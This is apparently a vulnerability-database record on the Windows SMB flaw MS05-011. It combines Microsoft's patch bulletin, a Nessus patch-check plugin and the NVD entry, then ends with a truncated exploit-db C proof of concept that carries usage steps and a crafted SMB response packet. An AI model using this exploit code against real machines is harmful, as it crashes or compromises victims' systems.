12-Oct-2004\r\n 05:07\r\n 496,000\r\n IA-64\r\n SP1QFE\r\n \r\nWcscdll.dll\r\n 5.1.2600.1599\r\n 28-Oct-2004\r\n 01:29\r\n 92,160\r\n x86\r\n SP1QFE\WOW\r\n \r\n\r\nWindows XP 64-Bit Edition Version 2003 (Itanium):\r\n\r\nFile Name Version Date Time Size CPU Folder \r\nMrxsmb.sys\r\n 5.2.3790.252\r\n 19-Jan-2005\r\n 00:57\r\n 1,122,816\r\n IA-64\r\n RTMGDR\r\n \r\nMrxsmb.sys\r\n 5.2.3790.252\r\n 19-Jan-2005\r\n 01:34\r\n 1,125,376\r\n IA-64\r\n RTMQFE\r\n \r\nRdbss.sys\r\n 5.2.3790.221\r\n 12-Oct-2004\r\n 00:30\r\n 464,896\r\n IA-64\r\n RTMQFE\r\n \r\n\r\nNotes The Windows XP and Windows XP 64-Bit Edition Version 2003 (Itanium) versions of this security update are packaged as dual-mode packages. These dual-mode packages contain files for the original version of Windows XP Service Pack 1 (SP1) and files for Windows XP Service Pack 2 (SP2). \r\n\r\nFor more information about dual-mode packages, see Microsoft Knowledge Base Article 328848. \r\n\r\nWhen you install this security update on Windows XP SP2 or on Windows XP 64-Bit Edition Version 2003 (Itanium), the installer checks to see if one or more of the files that are being updated on your system have previously been updated by a Microsoft hotfix.\r\n\r\nIf you have previously installed a hotfix to update an affected file, one of the following conditions occurs, depending on your operating system:\r\n\r\n\u2022 Windows XP SP2\r\n\r\nThe installer copies the SP2QFE files to your system.\r\n \r\n\u2022 Windows XP 64-Bit Edition Version 2003 (Itanium)\r\n\r\nThe installer copies the RTMQFE files to your system.\r\n \r\n\r\nIf you have not previously installed a hotfix to update an affected file, one of the following conditions occurs, depending on your operating system:\r\n\r\n\u2022 Windows XP SP2\r\n\r\nThe installer copies the SP2GDR files to your system.\r\n \r\n\u2022 Windows XP 64-Bit Edition Version 2003 (Itanium)\r\n\r\nThe installer copies the RTMGDR files to your system.\r\n \r\n\r\nFor more information about this behavior, see Microsoft Knowledge Base Article 824994.\r\n\r\nFor more information about the Update.exe installer, visit the Microsoft TechNet Web site.\r\n\r\nFor more information about the terminology that appears in this bulletin, such as hotfix, see Microsoft Knowledge Base Article 824684.\r\n\r\nNote For Windows XP 64-Bit Edition Version 2003 (Itanium), this security update is the same as the Windows Server 2003 for Itanium-based Systems security update.\r\n\r\nVerifying that the Update Has Been Applied\r\n\r\n\u2022 Microsoft Baseline Security Analyzer\r\n\r\nTo verify that a security update has been applied to an affected system, you may be able to use the Microsoft Baseline Security Analyzer (MBSA) tool. MBSA allows administrators to scan local and remote systems for missing security updates and for common security misconfigurations. For more information about MBSA, visit the Microsoft Baseline Security Analyzer Web site.\r\n \r\n\u2022 File Version Verification\r\n\r\nNote Because there are several versions of Microsoft Windows, the following steps may be different on your computer. If they are, see your product documentation to complete these steps.\r\n\r\n1.\r\n Click Start, and then click Search.\r\n \r\n2.\r\n In the Search Results pane, click All files and folders under Search Companion.\r\n \r\n3.\r\n In the All or part of the file name box, type a file name from the appropriate file information table, and then click Search.\r\n \r\n4.\r\n In the list of files, right-click a file name from the appropriate file information table, and then click Properties. \r\n\r\nNote Depending on the version of the operating system or programs installed, some of the files that are listed in the file information table may not be installed.\r\n \r\n5.\r\n On the Version tab, determine the version of the file that is installed on your computer by comparing it to the version that is documented in the appropriate file information table.\r\n\r\nNote Attributes other than the file version may change during installation. Comparing other file attributes to the information in the file information table is not a supported method of verifying that the update has been applied. Also, in certain cases, files may be renamed during installation. If the file or version information is not present, use one of the other available methods to verify update installation.\r\n \r\n \r\n\u2022 Registry Key Verification\r\n\r\nYou may also be able to verify the files that this security update has installed by reviewing the following registry keys.\r\n\r\nFor Windows XP Home Edition Service Pack 1, Windows XP Professional Service Pack 1, Windows XP Tablet PC Edition, Windows XP Media Center Edition, Windows XP Home Edition Service Pack 2, Windows XP Professional Service Pack 2, Windows XP Tablet PC Edition 2005, and Windows XP Media Center Edition 2005:\r\n\r\nHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates\Windows XP\SP3\KB885250\Filelist\r\n\r\nFor Windows XP 64-Bit Edition Version 2003 (Itanium):\r\n\r\nHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates\Windows Server 2003\SP1\KB885250\Filelist\r\n\r\nNote These registry keys may not contain a complete list of installed files. Also, these registry keys may not be created correctly if an administrator or an OEM integrates or slipstreams the 885250 security update into the Windows installation source files.\r\n \r\n\r\nTop of section\r\n\r\n Windows 2000 (all versions) \r\n\r\nPrerequisites\r\nFor Windows 2000, this security update requires Service Pack 3 (SP3) or Service Pack 4 (SP4). For Small Business Server 2000, this security update requires Small Business Server 2000 Service Pack 1a or Small Business Server 2000 running with Windows 2000 Server Service Pack 4.\r\n\r\nThe software that is listed has been tested to determine whether the versions are affected. Other versions either no longer include security update support or may not be affected. To determine the support life cycle for your product and version, visit the Microsoft Support Lifecycle Web site.\r\n\r\nFor more information about how to obtain the latest service pack, see Microsoft Knowledge Base Article 260910.\r\n\r\nInclusion in Future Service Packs:\r\nThe update for this issue will be included in a future Update Rollup.\r\n\r\nInstallation Information\r\n\r\nThis security update supports the following setup switches:\r\n\r\n /help Displays the command-line options\r\n\r\nSetup Modes\r\n\r\n /quiet Quiet mode (no user interaction or display)\r\n\r\n /passive Unattended mode (progress bar only)\r\n\r\n /uninstall Uninstalls the package\r\n\r\nRestart Options \r\n\r\n /norestart Do not restart when installation has completed\r\n\r\n /forcerestart Restart after installation\r\n\r\nSpecial Options \r\n\r\n /l Lists installed Windows hotfixes or update packages\r\n\r\n /o Overwrite OEM files without prompting\r\n\r\n /n Do not backup files needed for uninstall\r\n\r\n /f Force other programs to close when the computer shuts down\r\n\r\n /integrate:path Integrates the update into the Windows source files located at the path specified\r\n\r\n /extract Extracts files without starting the Setup program\r\n\r\nNote You can combine these switches into one command. For backward compatibility, the security update also supports the setup switches that the earlier version of the Setup program uses. For more information about the supported installation switches, see Microsoft Knowledge Base Article 262841. For more information about the Update.exe installer, visit the Microsoft TechNet Web site. For more information about the terminology that appears in this bulletin, such as hotfix, see Microsoft Knowledge Base Article 824684.\r\n\r\nDeployment Information\r\n\r\nTo install the security update without any user intervention, use the following command at a command prompt for Windows 2000 Service Pack 3 and Windows 2000 Service Pack 4:\r\n\r\nWindows2000-kb885250-x86-enu /passive /quiet\r\n\r\nTo install the security update without forcing the system to restart, use the following command at a command prompt for Windows 2000 Service Pack 3 and Windows 2000 Service Pack 4:\r\n\r\nWindows2000-kb885250-x86-enu /norestart\r\n\r\nFor more information about how to deploy this security update with Software Update Services, visit the Software Update Services Web site.\r\n\r\nRestart Requirement\r\n\r\nYou must restart your system after you apply this security update.\r\n\r\nRemoval Information\r\n\r\nTo remove this security update, use the Add or Remove Programs tool in Control Panel.\r\n\r\nSystem administrators can also use the Spuninst.exe utility to remove this security update. The Spuninst.exe utility is located in the %Windir%\$NTUninstallKB885250$\Spuninst folder. The Spuninst.exe utility supports the following setup switches:\r\n\r\n /help Displays the command line options\r\n\r\nSetup Modes\r\n\r\n /quiet Quiet mode (no user interaction or display)\r\n\r\n /passive Unattended mode (progress bar only)\r\n\r\nRestart Options \r\n\r\n /norestart Do not restart when installation is complete\r\n\r\n /forcerestart Restart after installation\r\n\r\nSpecial Options \r\n\r\n /f Force other programs to close when the computer shuts down\r\n\r\nFile Information\r\n\r\nThe English version of this security update has the file attributes that are listed in the following table. The dates and times for these files are listed in coordinated universal time (UTC). When you view the file information, it is converted to local time. To find the difference between UTC and local time, use the Time Zone tab in the Date and Time tool in Control Panel.\r\n\r\nWindows 2000 Service Pack 3, Windows 2000 Service Pack 4, and Small Business Server 2000:\r\n\r\nFile Name Version Date Time Size \r\nMrxsmb.sys\r\n 5.0.2195.7023\r\n 20-Jan-2005\r\n 07:25\r\n 413,104\r\n \r\nRdbss.sys\r\n 5.0.2195.7006\r\n 03-Dec-2004\r\n 03:37\r\n 170,512\r\n \r\nSp3res.dll\r\n 5.0.2195.7017\r\n 06-Jan-2005\r\n 04:29\r\n 6,278,656\r\n \r\n\r\nVerifying that the Update Has Been Applied\r\n\r\n\u2022 Microsoft Baseline Security Analyzer\r\n\r\nTo verify that a security update has been applied to an affected system, you may be able to use the Microsoft Baseline Security Analyzer (MBSA) tool. MBSA allows administrators to scan local and remote systems for missing security updates and for common security misconfigurations. For more information about MBSA, visit the Microsoft Baseline Security Analyzer Web site.\r\n \r\n\u2022 File Version Verification\r\n\r\nNote Because there are several versions of Microsoft Windows, the following steps may be different on your computer. If they are, see your product documentation to complete these steps.\r\n\r\n1.\r\n Click Start, and then click Search.\r\n \r\n2.\r\n In the Search Results pane, click All files and folders under Search Companion.\r\n \r\n3.\r\n In the All or part of the file name box, type a file name from the appropriate file information table, and then click Search.\r\n \r\n4.\r\n In the list of files, right-click a file name from the appropriate file information table, and then click Properties. \r\n\r\nNote Depending on the version of the operating system or programs installed, some of the files that are listed in the file information table may not be installed.\r\n \r\n5.\r\n On the Version tab, determine the version of the file that is installed on your computer by comparing it to the version that is documented in the appropriate file information table.\r\n\r\nNote Attributes other than the file version may change during installation. Comparing other file attributes to the information in the file information table is not a supported method of verifying that the update has been applied. Also, in certain cases, files may be renamed during installation. If the file or version information is not present, use one of the other available methods to verify update installation.\r\n \r\n \r\n\u2022 Registry Key Verification\r\n\r\nYou may also be able to verify the files that this security update has installed by reviewing the following registry key:\r\n\r\nHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates\Windows 2000\SP5\KB885250\Filelist\r\n\r\nNote This registry key may not contain a complete list of installed files. Also, this registry key may not be created correctly when an administrator or an OEM integrates or slipstreams the 885250 security update into the Windows installation source files.\r\n \r\n\r\nTop of section\r\n\r\nTop of section\r\nAcknowledgments\r\n\r\nMicrosoft thanks the following for working with us to help protect customers:\r\n\r\n\u2022 eEYE for reporting the Server Message Block Vulnerability (CAN-2005-0045).\r\n \r\n\r\nObtaining Other Security Updates:\r\n\r\nUpdates for other security issues are available at the following locations:\r\n\r\n\u2022 Security updates are available in the Microsoft Download Center. You can find them most easily by doing a keyword search for "security_patch."\r\n \r\n\u2022 Updates for consumer platforms are available at the Windows Update Web site. \r\n \r\n\r\nSupport: \r\n\r\n\u2022 Customers in the U.S. and Canada can receive technical support from Microsoft Product Support Services at 1-866-PCSAFETY. There is no charge for support calls that are associated with security updates.\r\n \r\n\u2022 International customers can receive support from their local Microsoft subsidiaries. There is no charge for support that is associated with security updates. For more information about how to contact Microsoft for support issues, visit the International Support Web site.\r\n \r\n\r\nSecurity Resources: \r\n\r\n\u2022 The Microsoft TechNet Security Web site provides additional information about security in Microsoft products. \r\n \r\n\u2022 Microsoft Software Update Services\r\n \r\n\u2022 Microsoft Baseline Security Analyzer (MBSA) \r\n \r\n\u2022 Windows Update \r\n \r\n\u2022 Windows Update Catalog: For more information about the Windows Update Catalog, see Microsoft Knowledge Base Article 323166.\r\n \r\n\u2022 Office Update \r\n \r\n\r\nSoftware Update Services:\r\n\r\nBy using Microsoft Software Update Services (SUS), administrators can quickly and reliably deploy the latest critical updates and security updates to Windows 2000 and Windows Server 2003-based servers, and to desktop systems that are running Windows 2000 Professional or Windows XP Professional.\r\n\r\nFor more information about how to deploy this security update by using Software Update Services, visit the Software Update Services Web site. \r\n\r\nSystems Management Server:\r\n\r\nMicrosoft Systems Management Server (SMS) delivers a highly-configurable enterprise solution for managing updates. By using SMS, administrators can identify Windows-based systems that require security updates and can perform controlled deployment of these updates throughout the enterprise with minimal disruption to end users. For more information about how administrators can use SMS 2003 to deploy security updates, visit the SMS 2003 Security Patch Management Web site. SMS 2.0 users can also use Software Updates Service Feature Pack to help deploy security updates. For information about SMS, visit the SMS Web site.\r\n\r\nNote SMS uses the Microsoft Baseline Security Analyzer and the Microsoft Office Detection Tool to provide broad support for security bulletin update detection and deployment. Some software updates may not be detected by these tools. Administrators can use the inventory capabilities of the SMS in these cases to target updates to specific systems. For more information about this procedure, visit the following Web site. Some security updates require administrative rights following a restart of the system. Administrators can use the Elevated Rights Deployment Tool (available in the SMS 2003 Administration Feature Pack and in the SMS 2.0 Administration Feature Pack) to install these updates.\r\n\r\nDisclaimer: \r\n\r\nThe information provided in the Microsoft Knowledge Base is provided "as is" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.\r\n\r\nRevisions: \r\n\r\n\u2022 V1.0 (February 8, 2005): Bulletin published\r\n \r\n", "cvss3": {}, "published": "2005-02-09T00:00:00", "type": "securityvulns", "title": "Microsoft Security Bulletin MS05-011 Vulnerability in Server Message Block Could Allow Remote Code Execution (885250)", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2005-0045"], "modified": "2005-02-09T00:00:00", "id": "SECURITYVULNS:DOC:7771", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:7771", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2023-01-11T14:37:30", "description": "The remote version of Windows contains a flaw in the Server Message Block (SMB) implementation that could allow an attacker to execute arbitrary code on the remote host.\n\nTo exploit this flaw, an attacker would need to send malformed responses to the remote SMB client, and would be able to either execute arbitrary code on the remote host or to perform a denial of service.", "cvss3": {}, "published": "2005-02-08T00:00:00", "type": "nessus", "title": "MS05-011: Vulnerability in SMB may allow remote code execution (885250)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": true}, "cvelist": ["CVE-2005-0045"], "modified": "2018-11-15T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS05-011.NASL", "href": "https://www.tenable.com/plugins/nessus/16326", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(16326);\n script_version(\"1.35\");\n script_cvs_date(\"Date: 2018/11/15 20:50:29\");\n\n script_cve_id(\"CVE-2005-0045\");\n script_bugtraq_id(12484);\n script_xref(name:\"MSFT\", value:\"MS05-011\");\n script_xref(name:\"CERT\", value:\"652537\");\n script_xref(name:\"EDB-ID\", value:\"1065\");\n script_xref(name:\"MSKB\", value:\"885250\");\n\n script_name(english:\"MS05-011: Vulnerability in SMB may allow remote code execution (885250)\");\n script_summary(english:\"Determines if hotfix 885250 has been installed\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"Arbitrary code can be executed on the remote host.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote version of Windows contains a flaw in the Server Message\nBlock (SMB) implementation that could allow an attacker to execute\narbitrary code on the remote host.\n\nTo exploit this flaw, an attacker would need to send malformed responses\nto the remote SMB client, and would be able to either execute arbitrary\ncode on the remote host or to perform a denial of service.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2005/ms05-011\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows 2000, XP and\n2003.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/02/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/02/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/02/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(english:\"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, 'Host/patch_management_checks');\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS05-011';\nkb = '885250';\n\nkbs = make_list(kb);\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win2k:'3,4', xp:'1,2', win2003:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nrootfile = hotfix_get_systemroot();\nif (!rootfile) exit(1, \"Failed to get the system root.\");\n\nshare = hotfix_path2share(path:rootfile);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n hotfix_is_vulnerable(os:\"5.2\", sp:0, file:\"Mrxsmb.sys\", version:\"5.2.3790.252\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.1\", sp:1, file:\"Mrxsmb.sys\", version:\"5.1.2600.1620\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.1\", sp:2, file:\"Mrxsmb.sys\", version:\"5.1.2600.2598\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.0\", file:\"Mrxsmb.sys\", version:\"5.0.2195.7023\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:kb)\n)\n{\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2023-02-09T13:57:28", "description": "The Server Message Block (SMB) implementation for Windows NT 4.0, 2000, XP, and Server 2003 does not properly validate certain SMB packets, which allows remote attackers to execute arbitrary code via Transaction responses containing (1) Trans or (2) Trans2 commands, aka the \"Server Message Block Vulnerability,\" and as demonstrated using Trans2 FIND_FIRST2 responses with large file name length fields.", "cvss3": {}, "published": "2005-05-02T04:00:00", "type": "cve", "title": "CVE-2005-0045", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": true}, "cvelist": ["CVE-2005-0045"], "modified": "2019-04-30T14:27:00", "cpe": ["cpe:/o:microsoft:windows_xp:*", "cpe:/o:microsoft:windows_2003_server:standard", "cpe:/o:microsoft:windows_2003_server:enterprise_64-bit", "cpe:/o:microsoft:windows_nt:4.0", "cpe:/o:microsoft:windows_2003_server:enterprise", "cpe:/o:microsoft:windows_2003_server:r2", "cpe:/o:microsoft:windows_2000:*", "cpe:/o:microsoft:windows_2003_server:web"], "id": "CVE-2005-0045", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0045", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_nt:4.0:sp2:server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp1:terminal_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_xp:*:*:media_center:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:*:terminal_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_2003_server:enterprise:*:64-bit:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp1:enterprise_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp2:enterprise_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_2003_server:web:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_2003_server:r2:*:datacenter_64-bit:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_2000:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp4:terminal_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_xp:*:*:64-bit:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:*:enterprise_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp6a:enterprise_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_xp:*:sp1:media_center:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_xp:*:sp2:home:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp5:workstation:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_2003_server:r2:*:64-bit:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp3:server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp6a:server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp4:workstation:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp1:server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_2003_server:standard:*:64-bit:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp1:workstation:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_xp:*:sp1:64-bit:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_xp:*:sp1:home:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp6a:terminal_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp5:enterprise_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp3:terminal_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_xp:*:gold:professional:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_2003_server:enterprise_64-bit:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_xp:*:sp2:tablet_pc:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp3:workstation:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp2:workstation:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_2000:*:sp4:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp5:terminal_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:*:workstation:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp4:server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp5:server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp3:enterprise_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_2000:*:sp3:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_2000:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp6a:workstation:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp2:terminal_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_xp:*:*:home:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:*:server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_xp:*:sp2:media_center:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp4:enterprise_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_2000:*:sp1:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2022-08-16T07:04:00", "description": "", "cvss3": {}, "published": "2005-06-23T00:00:00", "type": "exploitdb", "title": "Microsoft Windows - 'SMB' Transaction Response Handling (MS05-011)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": true}, "cvelist": ["2005-0045", "CVE-2005-0045"], "modified": "2005-06-23T00:00:00", "id": "EDB-ID:1065", "href": "https://www.exploit-db.com/exploits/1065", "sourceData": "/*\r\n * Windows SMB Client Transaction Response Handling\r\n *\r\n * MS05-011\r\n * CAN-2005-0045\r\n *\r\n * This works against >> Win2k <<\r\n *\r\n * cybertronic[at]gmx[dot]net\r\n * http://www.livejournal.com/users/cybertronic/\r\n *\r\n * usage:\r\n * gcc -o mssmb_poc mssmb_poc.c\r\n * ./mssmb_poc\r\n *\r\n * connect via \\\\ip\r\n * and hit the netbios folder!\r\n *\r\n * ***STOP: 0x00000050 (0xF115B000,0x00000001,0xFAF24690,\r\n * 0x00000000)\r\n * PAGE_FAULT_IN_NONPAGED_AREA\r\n *\r\n * The Client reboots immediately\r\n *\r\n * Technical Details:\r\n * -----------------\r\n *\r\n * The driver MRXSMB.SYS is responsible for performing SMB\r\n * client operations and processing the responses returned\r\n * by an SMB server service. A number of important Windows\r\n * File Sharing operations, and all RPC-over-named-pipes,\r\n * use the SMB commands Trans (25h) and Trans2 (32h). A\r\n * malicious SMB server can respond with specially crafted\r\n * Transaction response data that will cause an overflow\r\n * wherever the data is handled, either in MRXSMB.SYS or\r\n * in client code to which it provides data. One example\r\n * would be if the\r\n *\r\n * file name length field\r\n *\r\n * and the\r\n *\r\n * short file name length field\r\n *\r\n * in a Trans2 FIND_FIRST2 response packet can be supplied\r\n * with inappropriately large values in order to cause an\r\n * excessive memcpy to occur when the data is handled.\r\n * In the case of these examples an attacker could leverage\r\n * file:// links, that when clicked by a remote user, would\r\n * lead to code execution.\r\n *\r\n */\r\n\r\n#include <stdio.h>\r\n#include <sys/socket.h>\r\n#include <netinet/in.h>\r\n#include <netdb.h>\r\n\r\n#define PORT\t445\r\n\r\nunsigned char SmbNeg[] =\r\n\"\\x00\\x00\\x00\\x55\"\r\n\"\\xff\\x53\\x4d\\x42\" // SMB\r\n\"\\x72\" // SMB Command: Negotiate Protocol (0x72)\r\n\"\\x00\\x00\\x00\\x00\" // NT Status: STATUS_SUCCESS (0x00000000)\r\n\"\\x98\" // Flags: 0x98\r\n\"\\x53\\xc8\" // Flags2 : 0xc853\r\n\"\\x00\\x00\" // Process ID High: 0\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" // Signature: 0000000000000000\r\n\"\\x00\\x00\" // Reserved: 0000\r\n\"\\x00\\x00\" // Tree ID: 0\r\n\"\\xff\\xfe\" // Process ID: 65279\r\n\"\\x00\\x00\" // User ID: 0\r\n\"\\x00\\x00\" // Multiplex ID: 0\r\n\"\\x11\" // Word Count (WCT): 17\r\n\"\\x05\\x00\" // Dialect Index: 5, greater than LANMAN2.1\r\n\"\\x03\" // Security Mode: 0x03\r\n\"\\x0a\\x00\" // Max Mpx Count: 10\r\n\"\\x01\\x00\" // Max VCs: 1\r\n\"\\x04\\x11\\x00\\x00\" // Max Buffer Size: 4356\r\n\"\\x00\\x00\\x01\\x00\" // Max Raw Buffer 65536\r\n\"\\x00\\x00\\x00\\x00\" // Session Key: 0x00000000\r\n\"\\xfd\\xe3\\x00\\x80\" // Capabilities: 0x8000e3fd\r\n\"\\x52\\xa2\\x4e\\x73\\xcb\\x75\\xc5\\x01\" // System Time: Jun 20, 2005 12:08:32.327125000\r\n\"\\x88\\xff\" // Server Time Zone: /120 min from UTC\r\n\"\\x00\" // Key Length: 0\r\n\"\\x10\\x00\" // Byte Count (BCC): 16\r\n\"\\x9e\\x12\\xd7\\x77\\xd4\\x59\\x6c\\x40\" // Server GUID: 9E12D777D4596C40\r\n\"\\xbc\\xc0\\xb4\\x22\\x40\\x50\\x01\\xd4\";// BCC0B422405001D4\r\n\r\nunsigned char SessionSetupAndXNeg[] = // Negotiate ERROR 